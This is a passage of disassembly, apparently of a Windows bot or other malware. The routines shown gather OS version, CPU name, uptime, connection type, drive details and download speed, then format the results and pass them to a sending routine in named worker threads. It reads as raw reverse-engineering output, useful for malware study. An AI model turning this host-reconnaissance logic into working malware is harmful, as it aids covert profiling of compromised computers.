cmp [ebp+var_51C], 5
jnz short loc_40857C
cmp [ebp+var_518], 0
jnz short loc_40857C
mov [ebp+var_48C], offset a2000 ; "2000"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40857C: ; CODE XREF: sub_4083AD+1B8�j
; sub_4083AD+1C1�j
cmp [ebp+var_51C], 5
jnz short loc_40859A
cmp [ebp+var_518], 1
jnz short loc_40859A
mov [ebp+var_48C], offset aXp ; "XP"
jmp short loc_4085B6
; ---------------------------------------------------------------------------
loc_40859A: ; CODE XREF: sub_4083AD+1D6�j
; sub_4083AD+1DF�j
cmp [ebp+var_51C], 5
jnz short loc_4085B6
cmp [ebp+var_518], 2
jnz short loc_4085B6
mov [ebp+var_48C], offset a2003 ; "2003"
loc_4085B6: ; CODE XREF: sub_4083AD:loc_40851D�j
; sub_4083AD+191�j ...
cmp [ebp+var_510], 2
jnz short loc_4085D6
movsx eax, [ebp+var_50C]
test eax, eax
jz short loc_4085D6
lea eax, [ebp+var_50C]
mov [ebp+var_710], eax
loc_4085D6: ; CODE XREF: sub_4083AD+210�j
; sub_4083AD+21B�j
call sub_40435B
test eax, eax
jz short loc_4085EB
mov [ebp+var_744], offset aYes ; "Yes"
jmp short loc_4085F5
; ---------------------------------------------------------------------------
loc_4085EB: ; CODE XREF: sub_4083AD+230�j
mov [ebp+var_744], offset aNo ; "No"
loc_4085F5: ; CODE XREF: sub_4083AD+23C�j
mov eax, [ebp+var_744]
mov [ebp+var_4], eax
and [ebp+var_47C], 0
and [ebp+var_409], 0
xor eax, eax
cpuid
mov [ebp+var_488], ebx
mov [ebp+var_484], edx
mov [ebp+var_480], ecx
lea eax, [ebp+var_488]
mov [ebp+var_6EC], eax
and [ebp+var_70C], 0
lea eax, [ebp+var_70C]
push eax
push 20019h
push 0
push offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
push 80000002h
call dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_4086B3
and [ebp+var_73C], 0
mov [ebp+var_740], 80h
lea eax, [ebp+var_740]
push eax
lea eax, [ebp+var_488]
push eax
lea eax, [ebp+var_73C]
push eax
push 0
push offset aProcessornames ; "ProcessorNameString"
push [ebp+var_70C]
call dword_41700C ; RegQueryValueExA
test eax, eax
jnz short loc_4086A7
push 1
push 1
lea eax, [ebp+var_488]
push eax
call sub_407C2C
add esp, 0Ch
loc_4086A7: ; CODE XREF: sub_4083AD+2E5�j
push [ebp+var_70C]
call dword_417028 ; RegCloseKey
loc_4086B3: ; CODE XREF: sub_4083AD+2A8�j
cmp [ebp+var_6E4], 1
jnz short loc_4086C8
mov [ebp+var_748], offset byte_41DEC0
jmp short loc_4086D2
; ---------------------------------------------------------------------------
loc_4086C8: ; CODE XREF: sub_4083AD+30D�j
mov [ebp+var_748], offset dword_4191F4
loc_4086D2: ; CODE XREF: sub_4083AD+319�j
cmp [ebp+var_524], 1
jnz short loc_4086E7
mov [ebp+var_74C], offset byte_41DEC0
jmp short loc_4086F1
; ---------------------------------------------------------------------------
loc_4086E7: ; CODE XREF: sub_4083AD+32C�j
mov [ebp+var_74C], offset dword_4191F4
loc_4086F1: ; CODE XREF: sub_4083AD+338�j
cmp [ebp+var_6E8], 1
jnz short loc_408706
mov [ebp+var_750], offset byte_41DEC0
jmp short loc_408710
; ---------------------------------------------------------------------------
loc_408706: ; CODE XREF: sub_4083AD+34B�j
mov [ebp+var_750], offset dword_4191F4
loc_408710: ; CODE XREF: sub_4083AD+357�j
lea eax, [ebp+var_708]
push eax
lea eax, [ebp+var_6E0]
push eax
push [ebp+var_748]
push [ebp+var_6E4]
push [ebp+var_74C]
push [ebp+var_524]
push [ebp+var_750]
push [ebp+var_6E8]
push [ebp+var_4]
push [ebp+var_6F0]
push [ebp+var_738]
call sub_40821B
push eax
push [ebp+var_6EC]
push [ebp+var_514]
push [ebp+var_518]
push [ebp+var_51C]
push [ebp+var_710]
push [ebp+var_48C]
push offset dword_419104
push 400h
lea eax, [ebp+var_408]
push eax
call sub_416BAE ; _snprintf
add esp, 54h
lea eax, [ebp+var_408]
push eax
push offset dword_418B64
lea eax, [ebp+var_6C8]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_6CC]
call sub_409763
pop ecx
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_4083AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087C4 proc near ; CODE XREF: sub_40A9CF+1B9C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4087DE
jmp short locret_408806
; ---------------------------------------------------------------------------
loc_4087DE: ; CODE XREF: sub_4087C4+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aSysinfoThread ; "Sysinfo thread"
push 0
push [ebp+var_4]
push offset sub_4083AD
call sub_4095A4
add esp, 10h
locret_408806: ; CODE XREF: sub_4087C4+18�j
leave
retn
sub_4087C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408808 proc near ; CODE XREF: sub_408887+B�p
; sub_408887+19�p ...
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push [ebp+arg_0]
lea eax, [ebp+var_28]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_28]
push eax
call sub_4105FB
pop ecx
call sub_416B64 ; clock
mov [ebp+var_4], eax
push 7D0h
push 0
push offset a80 ; "80"
lea eax, [ebp+var_28]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_4053B1
pop ecx
cmp [ebp+var_8], 0
jnz short loc_40885F
mov eax, 3E8h
jmp short locret_408885
; ---------------------------------------------------------------------------
loc_40885F: ; CODE XREF: sub_408808+4E�j
call sub_416B64 ; clock
sub eax, [ebp+var_4]
cmp eax, 3E8h
jnb short loc_40887B
call sub_416B64 ; clock
sub eax, [ebp+var_4]
mov [ebp+var_2C], eax
jmp short loc_408882
; ---------------------------------------------------------------------------
loc_40887B: ; CODE XREF: sub_408808+64�j
mov [ebp+var_2C], 3E8h
loc_408882: ; CODE XREF: sub_408808+71�j
mov eax, [ebp+var_2C]
locret_408885: ; CODE XREF: sub_408808+55�j
leave
retn
sub_408808 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408887 proc near ; CODE XREF: sub_408B30+1C2�p
; sub_40CA29+1E9�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push offset dword_418F60
call sub_408808
pop ecx
mov [ebp+var_4], eax
push offset dword_418F6C
call sub_408808
pop ecx
mov [ebp+var_8], eax
push offset dword_418F84
call sub_408808
pop ecx
mov [ebp+var_C], eax
push offset dword_418F90
call sub_408808
pop ecx
mov [ebp+var_10], eax
push offset dword_418FA0
call sub_408808
pop ecx
mov [ebp+var_14], eax
push offset dword_418FB0
call sub_408808
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
add eax, [ebp+var_C]
add eax, [ebp+var_10]
add eax, [ebp+var_14]
add eax, [ebp+var_18]
xor edx, edx
push 6
pop ecx
div ecx
leave
retn
sub_408887 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088FC proc near ; CODE XREF: sub_408B30:loc_408D33�p
var_438 = qword ptr -438h
var_430 = dword ptr -430h
var_42C = qword ptr -42Ch
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = byte ptr -308h
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 438h
and [ebp+var_8], 0
jmp short loc_408912
; ---------------------------------------------------------------------------
loc_40890B: ; CODE XREF: sub_4088FC+23�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_408912: ; CODE XREF: sub_4088FC+D�j
mov eax, [ebp+var_8]
cmp off_418FC4[eax*4], 0
jz short loc_408921
jmp short loc_40890B
; ---------------------------------------------------------------------------
loc_408921: ; CODE XREF: sub_4088FC+21�j
mov eax, [ebp+var_8]
shr eax, 1
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_408936
; ---------------------------------------------------------------------------
loc_40892F: ; CODE XREF: sub_4088FC+D6�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_408936: ; CODE XREF: sub_4088FC+31�j
cmp [ebp+var_4], 3
jnb loc_408B2C
mov eax, [ebp+var_8]
dec eax
push eax
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_318], eax
mov eax, [ebp+var_318]
shl eax, 1
push off_418FC4[eax*4]
lea eax, [ebp+var_418]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_418]
push eax
call sub_4105FB
pop ecx
mov eax, [ebp+var_318]
shl eax, 1
push off_418FC8[eax*4]
lea eax, [ebp+var_308]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_308]
push eax
call sub_4105FB
pop ecx
push 2710h
push 0
push offset a80 ; "80"
lea eax, [ebp+var_418]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_310], eax
cmp [ebp+var_310], 0
jnz short loc_4089D7
jmp loc_40892F
; ---------------------------------------------------------------------------
loc_4089D7: ; CODE XREF: sub_4088FC+D4�j
lea eax, [ebp+var_418]
push eax
lea eax, [ebp+var_308]
push eax
push offset aGetSHttp1_0Hos ; "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n"
push 200h
lea eax, [ebp+var_208]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_208]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_208]
push eax
push [ebp+var_310]
call sub_4053BF
add esp, 0Ch
and [ebp+var_314], 0
call sub_416B64 ; clock
mov [ebp+var_41C], eax
and [ebp+var_30C], 0
loc_408A3A: ; CODE XREF: sub_4088FC+1AF�j
; sub_4088FC+22B�j
push 1388h
push 200h
lea eax, [ebp+var_208]
push eax
push [ebp+var_310]
call sub_405443
add esp, 10h
mov [ebp+var_420], eax
cmp [ebp+var_420], 0
jz short loc_408A93
cmp [ebp+var_420], 0FFFFFFFFh
jz short loc_408A93
call sub_416B64 ; clock
sub eax, [ebp+var_41C]
cmp eax, 1388h
jnb short loc_408A93
cmp [ebp+var_30C], 100000h
jb loc_408B15
loc_408A93: ; CODE XREF: sub_4088FC+16A�j
; sub_4088FC+173�j ...
cmp [ebp+var_30C], 2000h
jnb short loc_408AAD
push [ebp+var_310]
call sub_40538D
pop ecx
jmp short loc_408A3A
; ---------------------------------------------------------------------------
loc_408AAD: ; CODE XREF: sub_4088FC+1A1�j
mov eax, [ebp+var_30C]
mov dword ptr [ebp+var_42C], eax
and dword ptr [ebp+var_42C+4], 0
fild [ebp+var_42C]
fstp [ebp+var_430]
call sub_416B64 ; clock
sub eax, [ebp+var_41C]
mov dword ptr [ebp+var_438], eax
and dword ptr [ebp+var_438+4], 0
fild [ebp+var_438]
fdiv flt_417270
fdivr [ebp+var_430]
call sub_416CF8 ; _ftol
mov [ebp+var_424], eax
push [ebp+var_310]
call sub_40538D
pop ecx
mov eax, [ebp+var_424]
jmp short locret_408B2E
; ---------------------------------------------------------------------------
loc_408B15: ; CODE XREF: sub_4088FC+191�j
mov eax, [ebp+var_30C]
add eax, [ebp+var_420]
mov [ebp+var_30C], eax
jmp loc_408A3A
; ---------------------------------------------------------------------------
loc_408B2C: ; CODE XREF: sub_4088FC+3E�j
xor eax, eax
locret_408B2E: ; CODE XREF: sub_4088FC+217�j
leave
retn
sub_4088FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408B30 proc near ; DATA XREF: sub_408E4A+35�o
var_A9C = qword ptr -0A9Ch
var_A7C = qword ptr -0A7Ch
var_A74 = dword ptr -0A74h
var_A70 = dword ptr -0A70h
var_A6C = dword ptr -0A6Ch
var_A68 = dword ptr -0A68h
var_A64 = dword ptr -0A64h
var_A60 = dword ptr -0A60h
var_A5C = byte ptr -0A5Ch
var_8B8 = dword ptr -8B8h
var_8B4 = dword ptr -8B4h
var_8B0 = byte ptr -8B0h
var_830 = dword ptr -830h
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = dword ptr -824h
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = byte ptr -814h
var_414 = byte ptr -414h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A7Ch
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_A60]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push offset dword_41EFD8
lea eax, [ebp+var_414]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_824]
push eax
push 0
push 0
push offset dword_41EFD8
call dword_41DF14 ; getaddrinfo
test eax, eax
jnz short loc_408BBC
push 1
push 0
push 0
push 401h
lea eax, [ebp+var_414]
push eax
mov eax, [ebp+var_824]
push dword ptr [eax+10h]
mov eax, [ebp+var_824]
push dword ptr [eax+18h]
call dword_41DF18 ; getnameinfo
push [ebp+var_824]
call dword_41DF1C ; freeaddrinfo
loc_408BBC: ; CODE XREF: sub_408B30+54�j
call sub_409318
mov [ebp+var_8B8], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_830], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_820], eax
mov eax, [ebp+var_8B8]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_82C], eax
push offset aUnknown_0 ; "Unknown"
lea eax, [ebp+var_8B0]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset aUnknown_0 ; "Unknown"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
cmp dword_41DF0C, 0
jz short loc_408C9F
push 0
push 80h
lea eax, [ebp+var_8B0]
push eax
lea eax, [ebp+var_818]
push eax
call dword_41DF0C ; InternetGetConnectedStateExA
test eax, eax
jz short loc_408C9F
mov eax, [ebp+var_818]
and eax, 1
test eax, eax
jz short loc_408C8F
push offset aModem ; "Modem"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_408C9F
; ---------------------------------------------------------------------------
loc_408C8F: ; CODE XREF: sub_408B30+14B�j
push offset aLan ; "LAN"
lea eax, [ebp+var_10]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_408C9F: ; CODE XREF: sub_408B30+11F�j
; sub_408B30+13E�j ...
call sub_4043E9
test eax, eax
jz short loc_408CB4
mov [ebp+var_A64], offset aYes ; "Yes"
jmp short loc_408CBE
; ---------------------------------------------------------------------------
loc_408CB4: ; CODE XREF: sub_408B30+176�j
mov [ebp+var_A64], offset aNo ; "No"
loc_408CBE: ; CODE XREF: sub_408B30+182�j
mov eax, [ebp+var_A64]
mov [ebp+var_8], eax
call sub_404279
test eax, eax
jz short loc_408CDC
mov [ebp+var_A68], offset aYes ; "Yes"
jmp short loc_408CE6
; ---------------------------------------------------------------------------
loc_408CDC: ; CODE XREF: sub_408B30+19E�j
mov [ebp+var_A68], offset aNo ; "No"
loc_408CE6: ; CODE XREF: sub_408B30+1AA�j
mov eax, [ebp+var_A68]
mov [ebp+var_8B4], eax
call sub_408887
mov [ebp+var_828], eax
mov [ebp+var_81C], offset aBad ; "Bad"
cmp [ebp+var_828], 2EEh
jnb short loc_408D1D
mov [ebp+var_81C], offset aAvarage ; "Avarage"
loc_408D1D: ; CODE XREF: sub_408B30+1E1�j
cmp [ebp+var_828], 1F4h
jnb short loc_408D33
mov [ebp+var_81C], offset aGood ; "Good"
loc_408D33: ; CODE XREF: sub_408B30+1F7�j
call sub_4088FC
mov [ebp+var_4], eax
cmp [ebp+var_82C], 1
jnz short loc_408D50
mov [ebp+var_A6C], offset byte_41DEC0
jmp short loc_408D5A
; ---------------------------------------------------------------------------
loc_408D50: ; CODE XREF: sub_408B30+212�j
mov [ebp+var_A6C], offset dword_4191F4
loc_408D5A: ; CODE XREF: sub_408B30+21E�j
cmp [ebp+var_820], 1
jnz short loc_408D6F
mov [ebp+var_A70], offset byte_41DEC0
jmp short loc_408D79
; ---------------------------------------------------------------------------
loc_408D6F: ; CODE XREF: sub_408B30+231�j
mov [ebp+var_A70], offset dword_4191F4
loc_408D79: ; CODE XREF: sub_408B30+23D�j
cmp [ebp+var_830], 1
jnz short loc_408D8E
mov [ebp+var_A74], offset byte_41DEC0
jmp short loc_408D98
; ---------------------------------------------------------------------------
loc_408D8E: ; CODE XREF: sub_408B30+250�j
mov [ebp+var_A74], offset dword_4191F4
loc_408D98: ; CODE XREF: sub_408B30+25C�j
push [ebp+var_A6C]
push [ebp+var_82C]
push [ebp+var_A70]
push [ebp+var_820]
push [ebp+var_A74]
push [ebp+var_830]
mov eax, [ebp+var_4]
mov dword ptr [ebp+var_A7C], eax
and dword ptr [ebp+var_A7C+4], 0
fild [ebp+var_A7C]
fdiv flt_417274
push ecx
push ecx
fstp [esp+0A9Ch+var_A9C]
push [ebp+var_828]
push [ebp+var_81C]
push [ebp+var_8B4]
push [ebp+var_8]
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8B0]
push eax
lea eax, [ebp+var_414]
push eax
push offset dword_419284
push 400h
lea eax, [ebp+var_814]
push eax
call sub_416BAE ; _snprintf
add esp, 48h
lea eax, [ebp+var_814]
push eax
push offset dword_418B64
lea eax, [ebp+var_A5C]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_A60]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_408B30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E4A proc near ; CODE XREF: sub_40A9CF+1BD8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_408E64
jmp short locret_408E8C
; ---------------------------------------------------------------------------
loc_408E64: ; CODE XREF: sub_408E4A+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aNetinfoThread ; "Netinfo thread"
push 0
push [ebp+var_4]
push offset sub_408B30
call sub_4095A4
add esp, 10h
locret_408E8C: ; CODE XREF: sub_408E4A+18�j
leave
retn
sub_408E4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E8E proc near ; CODE XREF: sub_40CA29+1C5�p
; sub_40CA29+2DA�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_419398
mov [ebp+var_1C], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
loc_408EA4: ; CODE XREF: sub_408E8E+95�j
lea eax, [ebp+var_1C]
push eax
call dword_4170CC ; GetDriveTypeA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_408F14
cmp [ebp+var_10], 1
jz short loc_408F14
cmp [ebp+var_10], 5
jz short loc_408EE1
cmp [ebp+var_10], 2
jz short loc_408EE1
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_1C]
push eax
call dword_4170C8 ; GetDiskFreeSpaceExA
jmp short loc_408EF1
; ---------------------------------------------------------------------------
loc_408EE1: ; CODE XREF: sub_408E8E+33�j
; sub_408E8E+39�j
push 8
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_408EF1: ; CODE XREF: sub_408E8E+51�j
push 0
push 100000h
push [ebp+var_20]
push [ebp+var_24]
call sub_416C90
mov [ebp+var_24], eax
mov [ebp+var_20], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
loc_408F14: ; CODE XREF: sub_408E8E+27�j
; sub_408E8E+2D�j
mov al, byte ptr [ebp+var_1C]
add al, 1
mov byte ptr [ebp+var_1C], al
movsx eax, byte ptr [ebp+var_1C]
cmp eax, 5Ah
jnz loc_408EA4
mov eax, [ebp+var_C]
leave
retn
sub_408E8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408F2E proc near ; DATA XREF: sub_4091E2+35�o
var_5DC = dword ptr -5DCh
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = byte ptr -5D0h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = byte ptr -420h
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = byte ptr -40Ch
var_404 = byte ptr -404h
var_3EF = byte ptr -3EFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5DCh
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_5D4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 5
pop ecx
mov esi, offset aDriveInformati ; "Drive information - "
lea edi, [ebp+var_404]
rep movsd
movsb
mov ecx, 0FAh
xor eax, eax
lea edi, [ebp+var_3EF]
rep stosd
stosw
stosb
mov eax, dword_419398
mov [ebp+var_424], eax
and [ebp+var_418], 0
and [ebp+var_5D8], 0
and [ebp+var_414], 0
mov [ebp+var_410], 1
loc_408FA6: ; CODE XREF: sub_408F2E+23B�j
lea eax, [ebp+var_424]
push eax
call dword_4170CC ; GetDriveTypeA
mov [ebp+var_5DC], eax
cmp [ebp+var_5DC], 0
jz loc_409151
cmp [ebp+var_5DC], 1
jz loc_409151
cmp [ebp+var_5DC], 2
jnz short loc_408FE5
mov [ebp+var_4], offset aRemovable ; "removable"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_408FE5: ; CODE XREF: sub_408F2E+AC�j
cmp [ebp+var_5DC], 3
jnz short loc_408FF7
mov [ebp+var_4], offset aFixed ; "fixed"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_408FF7: ; CODE XREF: sub_408F2E+BE�j
cmp [ebp+var_5DC], 4
jnz short loc_409009
mov [ebp+var_4], offset aRemote ; "remote"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_409009: ; CODE XREF: sub_408F2E+D0�j
cmp [ebp+var_5DC], 5
jnz short loc_40901B
mov [ebp+var_4], offset aCdRom ; "cd-rom"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_40901B: ; CODE XREF: sub_408F2E+E2�j
cmp [ebp+var_5DC], 6
jnz short loc_40902D
mov [ebp+var_4], offset aRamdisk ; "ramdisk"
jmp short loc_409034
; ---------------------------------------------------------------------------
loc_40902D: ; CODE XREF: sub_408F2E+F4�j
mov [ebp+var_4], offset aUnknown ; "unknown"
loc_409034: ; CODE XREF: sub_408F2E+B5�j
; sub_408F2E+C7�j ...
cmp [ebp+var_5DC], 5
jz short loc_40906A
cmp [ebp+var_5DC], 2
jz short loc_40906A
lea eax, [ebp+var_42C]
push eax
lea eax, [ebp+var_420]
push eax
lea eax, [ebp+var_40C]
push eax
lea eax, [ebp+var_424]
push eax
call dword_4170C8 ; GetDiskFreeSpaceExA
jmp short loc_40907D
; ---------------------------------------------------------------------------
loc_40906A: ; CODE XREF: sub_408F2E+10D�j
; sub_408F2E+116�j
push 8
push 0
lea eax, [ebp+var_42C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_40907D: ; CODE XREF: sub_408F2E+13A�j
push 0
push 100000h
push [ebp+var_428]
push [ebp+var_42C]
call sub_416C90
mov [ebp+var_42C], eax
mov [ebp+var_428], edx
cmp [ebp+var_410], 0
jnz short loc_4090BF
push offset dword_419404
lea eax, [ebp+var_404]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
jmp short loc_4090C6
; ---------------------------------------------------------------------------
loc_4090BF: ; CODE XREF: sub_408F2E+17A�j
and [ebp+var_410], 0
loc_4090C6: ; CODE XREF: sub_408F2E+18F�j
mov eax, [ebp+var_42C]
or eax, [ebp+var_428]
test eax, eax
jz short loc_40910A
push [ebp+var_428]
push [ebp+var_42C]
push [ebp+var_4]
lea eax, [ebp+var_424]
push eax
lea eax, [ebp+var_404]
push eax
push offset dword_4193E4
lea eax, [ebp+var_404]
push eax
call dword_4171E0 ; wsprintfA
add esp, 1Ch
jmp short loc_409130
; ---------------------------------------------------------------------------
loc_40910A: ; CODE XREF: sub_408F2E+1A6�j
push [ebp+var_4]
lea eax, [ebp+var_424]
push eax
lea eax, [ebp+var_404]
push eax
push offset dword_4193D4
lea eax, [ebp+var_404]
push eax
call dword_4171E0 ; wsprintfA
add esp, 14h
loc_409130: ; CODE XREF: sub_408F2E+1DA�j
mov eax, [ebp+var_42C]
mov ecx, [ebp+var_414]
add ecx, eax
mov [ebp+var_414], ecx
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_409151: ; CODE XREF: sub_408F2E+92�j
; sub_408F2E+9F�j
mov al, byte ptr [ebp+var_424]
add al, 1
mov byte ptr [ebp+var_424], al
movsx eax, byte ptr [ebp+var_424]
cmp eax, 5Ah
jnz loc_408FA6
cmp [ebp+var_5D8], 0
jz short loc_40918B
push offset dword_419404
lea eax, [ebp+var_404]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
loc_40918B: ; CODE XREF: sub_408F2E+248�j
push [ebp+var_414]
push [ebp+var_5D8]
lea eax, [ebp+var_404]
push eax
push offset dword_41939C
lea eax, [ebp+var_404]
push eax
call dword_4171E0 ; wsprintfA
add esp, 14h
lea eax, [ebp+var_404]
push eax
push offset dword_418B64
lea eax, [ebp+var_5D0]
push eax
call sub_40D53F
add esp, 0Ch
push [ebp+var_5D4]
call sub_409763
pop ecx
xor eax, eax
pop edi
pop esi
leave
retn 4
sub_408F2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4091E2 proc near ; CODE XREF: sub_40A9CF+1C61�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4091FC
jmp short locret_409224
; ---------------------------------------------------------------------------
loc_4091FC: ; CODE XREF: sub_4091E2+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aDriveinfoThrea ; "Driveinfo thread"
push 0
push [ebp+var_4]
push offset sub_408F2E
call sub_4095A4
add esp, 10h
locret_409224: ; CODE XREF: sub_4091E2+18�j
leave
retn
sub_4091E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409226 proc near ; CODE XREF: .packed:00416A06�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_40928E
jg short loc_40924E
cmp [ebp+var_8], 0
jbe short loc_40928E
loc_40924E: ; CODE XREF: sub_409226+20�j
cmp [ebp+var_C], 0
jl short loc_40928E
jg short loc_40925C
cmp [ebp+var_10], 0
jbe short loc_40928E
loc_40925C: ; CODE XREF: sub_409226+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
mov dword_41E360, eax
jmp short locret_4092A2
; ---------------------------------------------------------------------------
loc_40928E: ; CODE XREF: sub_409226+1E�j
; sub_409226+26�j ...
call dword_4170D0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_41E360, eax
locret_4092A2: ; CODE XREF: sub_409226+66�j
leave
retn
sub_409226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4092A4 proc near ; CODE XREF: sub_4083AD+61�p
; sub_40A9CF+1CCA�p ...
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
